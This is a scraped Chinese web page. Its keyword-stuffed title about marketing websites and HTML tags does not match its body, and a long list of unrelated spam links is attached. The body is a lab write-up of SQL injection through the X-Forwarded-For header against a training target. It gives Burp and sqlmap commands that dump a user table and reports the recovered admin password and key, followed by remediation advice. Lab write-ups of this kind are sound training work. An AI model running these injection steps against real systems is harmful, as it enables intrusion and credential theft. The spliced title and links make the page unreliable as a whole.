当前位置: 首页 > news >正文

上海营销型企业网站html所有标签及其属性汇总

上海营销型企业网站,html所有标签及其属性汇总,东营有什么网站建设公司,扁平化网站设计教程0x00环境介绍 靶机http://219.153.49.228:48033,通过注入完成找到网站的key。 1|00x01复现过程 1.访问网站使用admin/admin登入#xff0c;用burpsuite截包寻找注入点 截到的包#xff0c;正常放包回显内容 加X-forwarded-for:1.1.1.1回显IP数据改变…0x00环境介绍 靶机http://219.153.49.228:48033,通过注入完成找到网站的key。 1|00x01复现过程 1.访问网站使用admin/admin登入用burpsuite截包寻找注入点 截到的包正常放包回显内容 加X-forwarded-for:1.1.1.1回显IP数据改变可能存在注入点 2.保存post包进行sql注入 保存post包1.txt加上X-forwarded-for:*作为注入点在windows上使用sqlmap跑 暴库python sqlmap.py -r 1.txt --dbs –batch 开始试了很多次payload也换了几个了没成功后来发现请求头和请求体没有分开。 修改后 a.暴数据库 python sqlmap.py -r 1.txt --dbs b.暴数据表 python sqlmap.py -r 1.txt -D webcalendar --tables c.暴列表 python sqlmap.py -r 1.txt -D webcalendar -T user --columns d.暴字段 python sqlmap.py -r 1.txt -D webcalendar -T user “password” --dumps 3.使用admin/116012900登入拿到keymozhebb8300a328e13dd2abd55c5d8dd 1|10x02修复建议 (1)程序代码里的所有查询语句使用标准化的数据库查询语句API接口设定语句的参数进行过滤一些非法的字符防止用户输入恶意的字符传入到数据库中执行sql语句。 (2)对用户提交的的参数安全过滤像一些特殊的字符*……%#等等进行字符转义操作,以及编码的安全转换。 (3)网站的代码层编码尽量统一建议使用utf8编码如果代码里的编码都不一样会导致一些过滤被直接绕过。 (4)网站的数据类型必须确定是数字型就是数字型字符型就是字符型数据库里的存储字段类型也设置为ini型。 (5)对用户的操作权限进行安全限制普通用户只给普通权限管理员后台的操作权限要放开尽量减少对数据库的恶意攻击。 (6)网站的报错信息尽量不要返回给客户端比如一些字符错误数据库的报错信息尽可能的防止泄露给客户端。 1|20x03总结思考 首先通过回显页面异常找到对应的注入点将post文件保存然后使用sqlmap跑post包另外请求体和请求头一定要分开。
http://www.tj-hxxt.cn/news/133239.html

相关文章:

  • 烟台网站seo服务装潢设计学校有哪些
  • 网站建设这个职业是什么软件开发需求分析常用的工具
  • 建立网站平台需要多少钱生物制药公司网站模板
  • 室内设计公司理念seo推广 课程
  • o2o商超网站建设河北邯郸天气预报
  • 建设网站宝安区wordpress主题功能
  • 网站用ai做还是ps深圳做网站服务商
  • 济南哪个网站建设最好一个网站怎么做软件好用
  • 临沂网站域名在线做动漫图片视频在线观看网站
  • 唯品会 一家专门做特卖的网站抚顺seo
  • 万网网站流量自己可以给公司做网站吗
  • 网站建设i有没有帮别人做创意的网站
  • 武进网站建设市场服务器选择
  • 廊坊电子网站建设wordpress二级开发
  • 网站推广方式怎么注销网站
  • 盗版小说网站怎么做的如何联系网站站长
  • 域名网站建设流程粉色网站模板
  • 网站提交搜索引擎后出现问题软件开发的工作
  • 高品质网站建设公司邢台信息港首页
  • 网站开发能进无形资产吗站长之家关键词挖掘
  • 东莞建外贸企业网站杭州平面设计
  • 深圳做积分商城网站建设网页设计公司有哪些国内
  • 网站集群建设价格判断网站是否被k
  • 济宁 创意大厦 网站建设h5网站开发模板
  • 网站关键词是什么意思上海环球金融中心观光厅
  • 威海市临港区建设局网站环保网页设计代码
  • 网站的后端用什么软件做江门网站关键词推广
  • 网站开发是培训湖北省公共资源交易中心
  • 建设银行网上流览网站电子商务网站设计步骤
  • wordpress如何打包成app廊坊首位关键词优化电话